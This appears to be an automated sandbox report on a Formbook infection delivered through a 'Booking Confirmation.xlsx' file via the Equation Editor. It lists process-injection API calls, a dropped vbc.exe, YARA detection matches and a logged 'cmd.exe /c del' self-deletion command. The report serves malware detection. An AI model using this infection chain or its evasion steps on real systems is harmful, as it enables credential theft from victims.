            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E69862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,7_2_01E69862
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E693D2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_01E693D2
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E69DAE NtResumeThread,7_2_01E69DAE
            Source: C:\Windows\SysWOW64\cmd.exeFile deleted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A38B84_2_003A38B8
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A09104_2_003A0910
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003AA3804_2_003AA380
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A04714_2_003A0471
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A1CB04_2_003A1CB0
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A24884_2_003A2488
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A2D584_2_003A2D58
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A0DA04_2_003A0DA0
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A10DB4_2_003A10DB
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A09014_2_003A0901
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A43C04_2_003A43C0
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A247A4_2_003A247A
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003ACC404_2_003ACC40
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A2D484_2_003A2D48
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003A0D914_2_003A0D91
            Source: C:\Users\Public\vbc.exeCode function: 4_2_003AA7284_2_003AA728
            Source: C:\Users\Public\vbc.exeCode function: 4_2_008918504_2_00891850
            Source: C:\Users\Public\vbc.exeCode function: 4_2_044300464_2_04430046
            Source: C:\Users\Public\vbc.exeCode function: 4_2_044300484_2_04430048
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_004010305_2_00401030
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041D9065_2_0041D906
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041DB325_2_0041DB32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041DBA55_2_0041DBA5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041E5ED5_2_0041E5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00402D905_2_00402D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041DE555_2_0041DE55
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00409E2C5_2_00409E2C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00409E305_2_00409E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041DF6E5_2_0041DF6E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041D7815_2_0041D781
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041CF935_2_0041CF93
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00402FB05_2_00402FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0091E0C65_2_0091E0C6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0094D0055_2_0094D005
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0093905A5_2_0093905A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009230405_2_00923040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0099D06D5_2_0099D06D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0091E2E95_2_0091E2E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009C12385_2_009C1238
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009C63BF5_2_009C63BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009463DB5_2_009463DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0091F3CF5_2_0091F3CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009223055_2_00922305
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009273535_2_00927353
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0096A37B5_2_0096A37B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009554855_2_00955485
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009314895_2_00931489
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009A443E5_2_009A443E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0095D47D5_2_0095D47D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0093C5F05_2_0093C5F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009A05E35_2_009A05E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0092351F5_2_0092351F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009665405_2_00966540
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009246805_2_00924680
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0092E6C15_2_0092E6C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0096A6345_2_0096A634
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009C26225_2_009C2622
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009A579A5_2_009A579A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0092C7BC5_2_0092C7BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009557C35_2_009557C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0099F8C45_2_0099F8C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009BF8EE5_2_009BF8EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0092C85C5_2_0092C85C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0094286D5_2_0094286D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009C098E5_2_009C098E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009229B25_2_009229B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009369FE5_2_009369FE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009A59555_2_009A5955
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009A394B5_2_009A394B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009D3A835_2_009D3A83
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009CCBA45_2_009CCBA4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009ADBDA5_2_009ADBDA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0091FBD75_2_0091FBD7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009A6BCB5_2_009A6BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00947B005_2_00947B00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009BFDDD5_2_009BFDDD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00950D3B5_2_00950D3B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0092CD5B5_2_0092CD5B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00952E2F5_2_00952E2F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0093EE4C5_2_0093EE4C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009BCFB15_2_009BCFB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00992FDC5_2_00992FDC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00930F3F5_2_00930F3F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0094DF7C5_2_0094DF7C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_020212387_2_02021238
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7E0C67_2_01F7E0C6
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F9905A7_2_01F9905A
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F830407_2_01F83040
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_020263BF7_2_020263BF
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FAD0057_2_01FAD005
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FA63DB7_2_01FA63DB
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7F3CF7_2_01F7F3CF
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FCA37B7_2_01FCA37B
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F873537_2_01F87353
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F823057_2_01F82305
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7E2E97_2_01F7E2E9
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F9C5F07_2_01F9C5F0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_020226227_2_02022622
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FC65407_2_01FC6540
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F8351F7_2_01F8351F
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F914897_2_01F91489
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FB54857_2_01FB5485
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FBD47D7_2_01FBD47D
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0200579A7_2_0200579A
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FB57C37_2_01FB57C3
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0200443E7_2_0200443E
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F8C7BC7_2_01F8C7BC
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F8E6C17_2_01F8E6C1
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F846807_2_01F84680
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FCA6347_2_01FCA634
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F969FE7_2_01F969FE
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F829B27_2_01F829B2
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02033A837_2_02033A83
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FA286D7_2_01FA286D
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F8C85C7_2_01F8C85C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0202CBA47_2_0202CBA4
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0200DBDA7_2_0200DBDA
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FBD77_2_01F7FBD7
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0201F8EE7_2_0201F8EE
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FA7B007_2_01FA7B00
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0200394B7_2_0200394B
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_020059557_2_02005955
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0202098E7_2_0202098E
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F8CD5B7_2_01F8CD5B
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FB0D3B7_2_01FB0D3B
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0201CFB17_2_0201CFB1
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FF2FDC7_2_01FF2FDC
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FADF7C7_2_01FADF7C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F90F3F7_2_01F90F3F
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F9EE4C7_2_01F9EE4C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FB2E2F7_2_01FB2E2F
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0201FDDD7_2_0201FDDD
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0013E5ED7_2_0013E5ED
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0013D7817_2_0013D781
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00122D907_2_00122D90
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00129E307_2_00129E30
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00129E2C7_2_00129E2C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0013DE557_2_0013DE55
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0013DF6E7_2_0013DF6E
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0013CF937_2_0013CF93
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00122FB07_2_00122FB0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E698627_2_01E69862
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E681327_2_01E68132
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E610697_2_01E61069
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E610727_2_01E61072
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E65B227_2_01E65B22
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E6DB0E7_2_01E6DB0E
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E65B1F7_2_01E65B1F
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E6DA6F7_2_01E6DA6F
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E6AA327_2_01E6AA32
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E62CEC7_2_01E62CEC
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E62CF27_2_01E62CF2
            Source: Booking Confirmation.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0091E2A8 appears 41 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0091DF5C appears 123 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0098F970 appears 84 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0096373B appears 245 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00963F92 appears 132 times
            Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01F7E2A8 appears 38 times
            Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01F7DF5C appears 120 times
            Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01FC3F92 appears 132 times
            Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01FC373B appears 245 times
            Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01FEF970 appears 84 times
            Source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: explorer.exe, 00000006.00000000.2197440508.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
            Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/6@5/3
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Booking Confirmation.xlsxJump to behavior
            Source: C:\Users\Public\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\JhCZAcEj
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBB3.tmpJump to behavior
            Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Booking Confirmation.xlsxVirustotal: Detection: 31%
            Source: Booking Confirmation.xlsxReversingLabs: Detection: 25%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
            Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'Jump to behavior
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
            Source: Booking Confirmation.xlsxStatic file information: File size 2169344 > 1048576
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: RAServer.pdb^ source: RegSvcs.exe, 00000005.00000002.2218050010.00000000003D0000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, raserver.exe
            Source: Binary string: RAServer.pdb source: RegSvcs.exe, 00000005.00000002.2218050010.00000000003D0000.00000040.00000001.sdmp
            Source: Binary string: RegSvcs.pdb source: raserver.exe, 00000007.00000002.2378949879.000000000245F000.00000004.00000001.sdmp
            Source: Booking Confirmation.xlsxInitial sample: OLE indicators vbamacros = False
            Source: Booking Confirmation.xlsxInitial sample: OLE indicators encrypted = True
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00E86178 pushad ; ret 4_2_00E86188
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00E85A4C push edx; iretd 4_2_00E85A51
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00E85219 push ss; retf 4_2_00E8521A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_004169BB push esi; ret 5_2_004169BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0040AB07 push ds; retf 5_2_0040AB09
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00414E05 push ss; retf 5_2_00414E06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041CEF2 push eax; ret 5_2_0041CEF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041CEFB push eax; ret 5_2_0041CF62
